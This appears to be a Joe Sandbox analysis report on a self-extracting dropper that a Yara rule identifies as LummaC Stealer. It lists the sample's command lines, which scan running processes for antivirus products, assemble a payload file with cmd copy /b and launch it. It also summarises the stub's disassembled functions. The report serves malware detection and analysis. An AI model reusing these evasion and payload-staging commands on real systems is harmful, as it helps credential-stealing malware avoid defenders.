Show Windows behavior

Target ID:	6
Start time:	15:04:46
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0xa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:04:47
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7ff6d64d0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:04:47
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0xa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:04:47
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 5758
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:04:47
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:04:48
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Ink 5758\o
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:04:48
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
Wow64 process (32bit):	true
Commandline:	5758\Apply.pif 5758\o
Imagebase:	0x850000
File size:	946'784 bytes
MD5 hash:	848164D084384C49937F99D5B894253E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:04:48
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0x770000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.2%
Total number of Nodes:	1600
Total number of Limit Nodes:	25

Executed Functions

Function 00404E5F Relevance: 60.2, APIs: 15, Strings: 19, Instructions: 710
keyboardlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_new_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00404E48), ref: 00404E70
GetLastError.KERNEL32 ref: 00404E76
GetTickCount.KERNEL32 ref: 00404E84
GetTickCount.KERNEL32 ref: 00404E90
GetTickCount.KERNEL32 ref: 00404E99
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404EDC
GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 00404EE8
FreeConsole.KERNELBASE ref: 00404EEE
GetCommandLineW.KERNEL32(?), ref: 00404EF9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000000), ref: 00404F4F
wsprintfW.USER32 ref: 00405152

Part of subcall function 004048E2: lstrcmpiW.KERNEL32(00000000,0041D424), ref: 0040497F

CoInitializeEx.OLE32(00000000,00000006,00000000), ref: 004052BA
GetKeyState.USER32(00000010), ref: 0040531F
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,setup.exe, ;a), ref: 004055C6
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,setup.exe,?,?,?,?,setup.exe, ;a), ref: 0040566D

Strings

kernel32.dll, xrefs: 00404ED7
FreeConsole, xrefs: 00404EE2
HelpText, xrefs: 00405241
SfxString%d, xrefs: 0040514C
InstallPath, xrefs: 004052C2
FinishMessage, xrefs: 004056C2
setup.exe, xrefs: 00405583, 00405603
sfxconfig, xrefs: 004050C1
Delete, xrefs: 0040567B
RunProgram, xrefs: 004053E4, 004053F4
BeginPrompt, xrefs: 004052EE
Shortcut, xrefs: 00405655
SetEnvironment, xrefs: 004051B1, 00405203
7ZipSfx.%03x, xrefs: 0040547B
;a, xrefs: 004052CC, 004052E5, 00405488, 004054A6, 004054AE, 004054E4, 00405517, 00405590, 004055FA
ExecuteFile, xrefs: 004053BC, 004053CC
X/a, xrefs: 00404F40, 00404F67, 00404F98, 00404FA2, 00404FA8, 00404FB3, 00404FDB, 00404FEC, 00405750
AutoInstall, xrefs: 00405352, 004053A3
SelfDelete, xrefs: 00405735

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CountTick$FileModule$AddressAttributesCommandConsoleCurrentDirectoryErrorFreeHandleInitializeLastLineNameProcState_set_new_handlerlstrcmpiwsprintf
String ID: ;a$7ZipSfx.%03x$AutoInstall$BeginPrompt$Delete$ExecuteFile$FinishMessage$FreeConsole$HelpText$InstallPath$RunProgram$SelfDelete$SetEnvironment$SfxString%d$Shortcut$X/a$kernel32.dll$setup.exe$sfxconfig
API String ID: 3569819413-1235976401
Opcode ID: 96c7d2604809570e33cb2b075eccd7d9456be39bf8f0815fbe74550c2e1818a7
Instruction ID: 4afe0878e147a2e11ef65875d1da5f9dd05df955ab03a5773119f13ba72f50e1
Opcode Fuzzy Hash: 96c7d2604809570e33cb2b075eccd7d9456be39bf8f0815fbe74550c2e1818a7
Instruction Fuzzy Hash: 78320571E40204BADB20BBA5EC42BAF37A4EF51318F50447FF502B61E2EA7C59918B5D

Function 004030A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 149
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000000,?,0000FDE9), ref: 004030E7
wsprintfW.USER32 ref: 004030F8
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403107
GetLastError.KERNEL32 ref: 00403112
GetEnvironmentVariableW.KERNEL32(?,00000000,00000001), ref: 0040313C
GetLastError.KERNEL32 ref: 00403147
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403159
SetLastError.KERNEL32(0000FDE9), ref: 0040318D
lstrlenA.KERNEL32(0041C988), ref: 004031C3
GetLocaleInfoW.KERNELBASE(?,00001004,?,0000001F), ref: 00403212
_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00403223
MultiByteToWideChar.KERNEL32(000004E4,00000000,0041C988,00000001,00000000,00000002), ref: 00403249

Strings

SfxString%d, xrefs: 004030F2

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: SfxString%d
API String ID: 1136850766-944934635
Opcode ID: 269413e4b320063d0a99b95639d03ee5df7cdd5b2e2d540aab0701addce4f405
Instruction ID: 27ca05c9e335442d622ca2a47e4c9ab7e1339845b52ecf7c62671a400ab31f62
Opcode Fuzzy Hash: 269413e4b320063d0a99b95639d03ee5df7cdd5b2e2d540aab0701addce4f405
Instruction Fuzzy Hash: 7851C471640248EFD7209F75DC85EBA7BBCEB48751B10443FE51AD72A0DB34A9918B2C

Function 00402B9F Relevance: 15.1, APIs: 10, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,0041C878,00402D0D,?,00000000), ref: 00402BCC
lstrcmpW.KERNEL32(?,0041C880,?,00402D0D), ref: 00402C18
lstrcmpW.KERNEL32(?,0041C884), ref: 00402C2E
SetFileAttributesW.KERNELBASE(?,00000000,?,00402D0D), ref: 00402C47
DeleteFileW.KERNELBASE(?), ref: 00402C54
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00402C66
FindClose.KERNEL32(00000000), ref: 00402C75
SetCurrentDirectoryW.KERNEL32 ref: 00402C81
SetFileAttributesW.KERNEL32(00402D0D,00000000), ref: 00402C8B
RemoveDirectoryW.KERNEL32(00402D0D), ref: 00402C98

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: File$Find$AttributesDirectorylstrcmp$CloseCurrentDeleteFirstNextRemove
String ID:
API String ID: 3205300333-0
Opcode ID: 96032a157d23d1dc45f13d9c3f4a995ba2b4e5d1d556b222625182af2114dbe1
Instruction ID: 3453198f1be8e90aa2df61ca43fe5628ecf2ddba4b1262b2c9c77ae1f167302a
Opcode Fuzzy Hash: 96032a157d23d1dc45f13d9c3f4a995ba2b4e5d1d556b222625182af2114dbe1
Instruction Fuzzy Hash: F4318430A40218BBEB10AFB1ED8CAEE7B78AF04345F108176F505B10E1EB788A55CA58

Function 00401B98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00401C3C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 00401C4F
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00401C58

Strings

runas, xrefs: 00401BF3
<, xrefs: 00401BCC

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: <$runas
API String ID: 3837156514-1187129395
Opcode ID: 36d045fd44f72857857818416a151f34c24b224d1092a382124e66874ca56cf0
Instruction ID: 78f5ae85b9204d7899ea5eda7a0158750262f1f2b2930ba17ea377ca9dbeb8ac
Opcode Fuzzy Hash: 36d045fd44f72857857818416a151f34c24b224d1092a382124e66874ca56cf0
Instruction Fuzzy Hash: 7C216D71D44208ABDB10AFD4DC85ADEBBB8EF04314F10413BF915B62D1DB789994CB88

Function 0040325A Relevance: 6.0, APIs: 4, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 0040326D
FindClose.KERNEL32(00000000), ref: 0040327D
SetLastError.KERNEL32(00000010), ref: 0040328E

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: 1bc8a92f7bf4e73e95de5579a55d09b4ff18af9b851be28831b70a4c99eb5016
Instruction ID: abe97d326cd857d1968a3b6552ec4a15e1ca3de2d1a8ed727a5189f7341d7c6c
Opcode Fuzzy Hash: 1bc8a92f7bf4e73e95de5579a55d09b4ff18af9b851be28831b70a4c99eb5016
Instruction Fuzzy Hash: A8F068307405489BCF205F74DC4DB9B3FAD6B4436EF1046B5E425E00E0D778CA859A48

Function 00402CB4 Relevance: 6.0, APIs: 4, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00404B53,?), ref: 00402CC7
FindClose.KERNEL32(00000000), ref: 00402CD8
SetFileAttributesW.KERNEL32(00404B53,00000000), ref: 00402CEC
DeleteFileW.KERNEL32(00404B53), ref: 00402CF9

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: File$Find$AttributesCloseDeleteFirst
String ID:
API String ID: 3319113142-0
Opcode ID: bb03c308241e8e5f3fb93b425169e8c9e85a9ef2b4610538343182683258a875
Instruction ID: b9a335d4804febfc6b74adfb8316b075736e73c60aae6555d53a99530bbd896d
Opcode Fuzzy Hash: bb03c308241e8e5f3fb93b425169e8c9e85a9ef2b4610538343182683258a875
Instruction Fuzzy Hash: E9F01231640148ABDF115F74ED8D7DA3FA9AF4135AF408275F91AE40E0D7B4C9859A88

Function 00402648 Relevance: 4.7, APIs: 3, Instructions: 153stringtimeCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 00402655

Part of subcall function 00402F39: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0000FDE9,00000001), ref: 00402F67

GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?), ref: 004026D1
GetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004026D8

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FileTime$AttributesSystemlstrlenwcsncpy
String ID:
API String ID: 335106176-0
Opcode ID: 9df67e113f3f435cc9ad515a2b875d0a94ddbfd9d0c9105ed0ecdbe9374f7209
Instruction ID: 306e290e7d3cbb57f0f296fdb79284127d5b59bcfd53eb128dc102add6985be1
Opcode Fuzzy Hash: 9df67e113f3f435cc9ad515a2b875d0a94ddbfd9d0c9105ed0ecdbe9374f7209
Instruction Fuzzy Hash: 1A410B75500206AADB20AB69DD49EBB73A8DF40354F50443BFD45F71C2EBB8CD82829D

Function 00404B55 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 00404B66
#17.COMCTL32 ref: 00404B71

Part of subcall function 004030A0: GetLastError.KERNEL32(00000000,?,0000FDE9), ref: 004030E7
Part of subcall function 004030A0: wsprintfW.USER32 ref: 004030F8
Part of subcall function 004030A0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403107
Part of subcall function 004030A0: GetLastError.KERNEL32 ref: 00403112
Part of subcall function 004030A0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000001), ref: 0040313C
Part of subcall function 004030A0: GetLastError.KERNEL32 ref: 00403147
Part of subcall function 004030A0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403159
Part of subcall function 004030A0: SetLastError.KERNEL32(0000FDE9), ref: 0040318D
Part of subcall function 004030A0: lstrlenA.KERNEL32(0041C988), ref: 004031C3

Part of subcall function 004030A0: GetLocaleInfoW.KERNELBASE(?,00001004,?,0000001F), ref: 00403212
Part of subcall function 004030A0: _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00403223
Part of subcall function 004030A0: MultiByteToWideChar.KERNEL32(000004E4,00000000,0041C988,00000001,00000000,00000002), ref: 00403249

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404BE1
wsprintfW.USER32 ref: 00404BF5

Strings

kernel32, xrefs: 00404B61
SfxFolder%02d, xrefs: 00404BEF
X_, xrefs: 00404BA9

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariablewsprintf$ByteCharFolderInfoLibraryLoadLocaleMultiPathSpecialWide_wtollstrcmpilstrlen
String ID: X_$SfxFolder%02d$kernel32
API String ID: 3992867532-4069207936
Opcode ID: b421ebe6b715a4417a1035f21c31ec6f16a4e254f716bb883ef1bcc1e6194833
Instruction ID: 89a8dc293236b0d0fc7814e9228c4fb2a05a67d15382cf7a7f96f31eac11dc57
Opcode Fuzzy Hash: b421ebe6b715a4417a1035f21c31ec6f16a4e254f716bb883ef1bcc1e6194833
Instruction Fuzzy Hash: 7321C8F2E41208ABD7206FB1AC85BC97AACAB94305F40017BF601E71A5EA3D55818F5C

Function 00401F28 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G"@, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID: G"@
API String ID: 0-1543128551
Opcode ID: 902ae6c0eb8b4ff0883d1864bb150b8d0177d7163e04afd0f79fdd1796088568
Instruction ID: 014c61ef234fb2cc4baf5c7837711bf9ccce270aa3eba8b9d283cb3c51cd8214
Opcode Fuzzy Hash: 902ae6c0eb8b4ff0883d1864bb150b8d0177d7163e04afd0f79fdd1796088568
Instruction Fuzzy Hash: DDA1A171900205AFCF10DFA4CD88AAA77B9BF48314F20416BF901BB2D1DBB8D942CB94

Function 00401896 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402434: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,004018B9,?,?,?,?), ref: 0040244D
Part of subcall function 00402434: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00402463

_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?,?,?,?,?), ref: 0040190B
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401AC0

Strings

shc, xrefs: 0040191D
del, xrefs: 00401931
hidcon, xrefs: 004018CD
ExecuteParameters, xrefs: 004019A6

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CurrentDirectory$ErrorLast_wtol
String ID: ExecuteParameters$del$hidcon$shc
API String ID: 1962837881-796110186
Opcode ID: ae64264f67d199b70bf70bd0f58bd8e74997cb805c53ebfa10936986b9a4cc5b
Instruction ID: d78e6fe2fc078fe1fb2f15453550ca39fa6452a259d23795430bc67ec2622554
Opcode Fuzzy Hash: ae64264f67d199b70bf70bd0f58bd8e74997cb805c53ebfa10936986b9a4cc5b
Instruction Fuzzy Hash: BE61DA729001196ACB11BBE2EC92ADE7778AF15318F10443FF801721E2EB7D5A54CA6D

Function 004039F5 Relevance: 6.1, APIs: 4, Instructions: 136
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,?,004037B2,?,;!@Install@!UTF-8!,;!@InstallEnd@!,?), ref: 00403A27
lstrlenA.KERNEL32(?,?,?,004037B2,?,;!@Install@!UTF-8!,;!@InstallEnd@!,?), ref: 00403A2F
_memcmp.LIBVCRUNTIME ref: 00403A9A
_memcmp.LIBVCRUNTIME ref: 00403ADB

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmplstrlen
String ID:
API String ID: 107979428-0
Opcode ID: 24fa67dd89d87232b2317cf213c8b28d584d317f3ca0f03376eb79333407719e
Instruction ID: 6402c627ec436edd1f87d5aa906f155b919943eeefaeb0d80dc221bf8a7ac236
Opcode Fuzzy Hash: 24fa67dd89d87232b2317cf213c8b28d584d317f3ca0f03376eb79333407719e
Instruction Fuzzy Hash: B9417071E00259AFCB00DFA9CC84BEEBBB9EF45349F14406AE855B7241E674AE41CB64

Function 00401D61 Relevance: 6.1, APIs: 4, Instructions: 101
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00001ECF,?,00000000,?), ref: 00401D8C
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,?), ref: 00401DB5
GetExitCodeThread.KERNELBASE(00000000,?,?,00000000,?,?), ref: 00401E19
SetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 00401E52

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 2732711357-0
Opcode ID: cdba668cde040187ae8bc5d380b77640ac0343d47f686720fa2e3dc68632ca05
Instruction ID: c199a7d70de278c96d800d4c4787870e84706badbc32cc5c702e27f211e5f69e
Opcode Fuzzy Hash: cdba668cde040187ae8bc5d380b77640ac0343d47f686720fa2e3dc68632ca05
Instruction Fuzzy Hash: 83310779700201BADB345B55DC85EAB3669EBC5714B20813FFC02E52F0D67CD882DA9D

Function 00402AC3 Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402F39: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0000FDE9,00000001), ref: 00402F67

GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00402ADF
GetTempPathW.KERNEL32(00000001,00000000,00000001), ref: 00402B02
wsprintfW.USER32 ref: 00402B33
GetFileAttributesW.KERNELBASE(?), ref: 00402B4F

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: PathTemp$AttributesFilewcsncpywsprintf
String ID:
API String ID: 1999176734-0
Opcode ID: abcf9953a8667e16599663c1dfca3f9779a9e0039f4c80580b6036b14b5af4cd
Instruction ID: 9041bacfb6c6e904b5f526c5c7ee405d76f87ccf5e001e4bc097786daec979fc
Opcode Fuzzy Hash: abcf9953a8667e16599663c1dfca3f9779a9e0039f4c80580b6036b14b5af4cd
Instruction Fuzzy Hash: C211DAB1600615ABC7159F65DC8586EBBADFF48314700413BF80AE72D0DBB4AD10CBD8

Function 0041A382 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040EA5E,00000000,?,?,?,?,0040E89D,?,004013F4), ref: 0041A38A
